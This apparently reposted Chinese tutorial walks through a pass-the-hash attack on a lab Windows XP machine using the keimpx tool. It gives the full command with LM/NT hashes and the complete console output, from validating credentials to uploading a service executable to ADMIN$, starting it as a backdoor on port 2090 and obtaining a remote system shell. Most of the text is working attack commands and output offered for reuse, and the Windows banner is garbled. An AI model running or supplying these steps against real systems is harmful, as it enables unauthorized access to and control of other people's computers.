测试目标机器是winxp，ip:192.168.1.5。由于不是域机器，所以事先我关闭了防火墙和使用简单文件共享（打开我的文档->工具->文件夹选项->查看->去掉使用简单文件共享前的√）。
 
运行命令：
 
root@bt:/pentest/passwords/keimpx# ./keimpx.py -t 192.168.1.5 -v 1 -p 445 -U iishelp --nt=ccf9155e3e7db453aad3b435b51404ee --lm=3dbde697d71690a769204beb12283678
 
回显(其中以下的红字是让你选择的和我输的命令)：
 
 
This product includes software developed by CORE Security Technologies
 
(http://www.coresecurity.com), Python Impacket library
 
 
 
    keimpx 0.2
 
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
 
   
 
[13:46:20] [INFO] Loading targets
 
[13:46:20] [INFO] Loading credentials
 
[13:46:20] [INFO] Loading domains
 
[13:46:20] [INFO] Loaded 1 unique targets
 
[13:46:20] [INFO] Loaded 1 unique credentials
 
[13:46:20] [INFO] No domains specified, using NULL domain
 
[13:46:20] [INFO] Attacking host 192.168.1.5:445
 
[13:46:20] [INFO] Valid credentials on 192.168.1.5:445: iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
 
[13:46:20] [INFO] Attack on host 192.168.1.5:445 finished
 
 www.2cto.com
 
The credentials worked in total 1 times
 
 
 
TARGET SORTED RESULTS:
 
 
 
192.168.1.5:445
 
  iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
 
 
 
 
 
USER SORTED RESULTS:
 
 
 
iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
 
  192.168.1.5:445
 
 
 
Do you want to get a shell from any of the targets? [Y/n]
 
Which target do you want to connect to?
 
[1] 192.168.1.5:445
 
> 1
 
Which credentials do you want to use to connect?
 
[1] iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
 
> 1
 
[13:46:35] [INFO] type 'help' for help menu
 
# help
 
Generic options
 
===============
 
help - show this message
 
verbosity {level} - set verbosity level (0-2)
 
info - list system information
 
exit - terminates the SMB session and exit from the tool
 
 
 
Shares options
 
==============
 
shares - list available shares
 
use {sharename} - connect to an specific share
 
cd {path} - changes the current directory to {path}
 
pwd - shows current remote directory
 
ls {path} - lists all the files in the current directory
 
cat {file} - display content of the selected file
 
download {filename} - downloads the filename from the current path
 
upload {filename} - uploads the filename into the current path
 
mkdir {dirname} - creates the directory under the current path
 
rm {file} - removes the selected file
 
rmdir {dirname} - removes the directory under the current path
 
 
 
Services options
 
================
 
deploy {service name} {local file} [service args] - deploy remotely a service executable
 
undeploy {service name} {remote file} - undeploy remotely a service executable
 
 
 
Shell options
 
=============
 
shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp
 
 
 
Users options
 
=============
 
users [domain] - list users, optionally for a specific domain
 
pswpolicy [domain] - list password policy, optionally for a specific domain
 
domains - list domains to which the system is part of
 
 
 
Registry options (Soon)
 
================
 
regread {registry key} - read a registry key
 
regwrite {registry key} {registry value} - add a value to a registry key
 
regdelete {registry key} - delete a registry key
 
 
 
# shell
 
[13:47:09] [INFO] Uploading the service executable to 'ADMIN$\urakxn.exe'
 
[13:47:09] [INFO] Connecting to the SVCCTL named pipe
 
[13:47:09] [INFO] Creating the service 'Ynohkb'
 
[13:47:09] [INFO] Starting the service 'Ynohkb'
 
[13:47:09] [INFO] Connecting to backdoor on port 2090, wait..
 
Microsoft Windows XP [\ufffd\u6c7e 5.1.2600]
 
(C) \ufffd\ufffd\u0228\ufffd\ufffd\ufffd\ufffd 1985-2001 Microsoft Corp.
 
 
 
C:\WINDOWS\system32>
 
摘自 vbs小铺